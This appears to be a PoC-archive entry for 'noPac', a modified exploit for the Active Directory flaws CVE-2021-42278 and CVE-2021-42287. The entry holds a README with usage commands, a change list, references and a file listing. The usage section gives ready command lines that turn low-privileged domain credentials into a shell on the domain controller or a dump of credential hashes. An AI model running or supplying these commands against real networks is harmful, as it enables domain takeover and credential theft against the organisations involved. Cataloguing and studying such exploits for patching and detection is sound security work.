CVE-2021-42278 PoC — Active Directory Domain Services Elevation of Privilege Vulnerability

Associated Vulnerability
Title: Active Directory Domain Services Elevation of Privilege Vulnerability (CVE-2021-42278)
Description: Active Directory Domain Services Elevation of Privilege Vulnerability
Description
Exploiting CVE-2021-42278 and CVE-2021-42287
Readme
# noPac
Exploiting CVE-2021-42278 and CVE-2021-42287 <br>
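The original noPac project may have some implementation problems, which meant it did not work locally, so it was modified with reference to the sam-the-admin project.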

# Usage
```
pip3 install -r requirements.txt
# GetShell
python3 exp.py "domain/Username:Passw0rd" -dc-ip 192.168.0.254 -shell
# DumpHash
python3 exp.py "domain/Username:Passw0rd" -dc-ip 192.168.0.254 -dump
```


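# Changes
- Fixed the execution-path problems with smbexec and similar tools under Kali in the original author's version
- Changed the hostname signature of the simulated host that comes online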


# References
https://github.com/cube0x0/noPac <br>
https://github.com/WazeHell/sam-the-admin
File Snapshot

```
[4.0K] /data/pocs/6b7b2ad9a494cde2e39a2e4da363515373771e01
├── [8.0K] exp.py
├── [ 597] README.md
├── [ 16] requirements.txt
├── [ 20K] secretsdump.py
├── [ 16K] smbexec.py
└── [4.0K] utils
    ├── [ 10K] addcomputer.py
    ├── [ 13K] helper.py
    └── [ 31K] S4U2self.py

1 directory, 8 files
```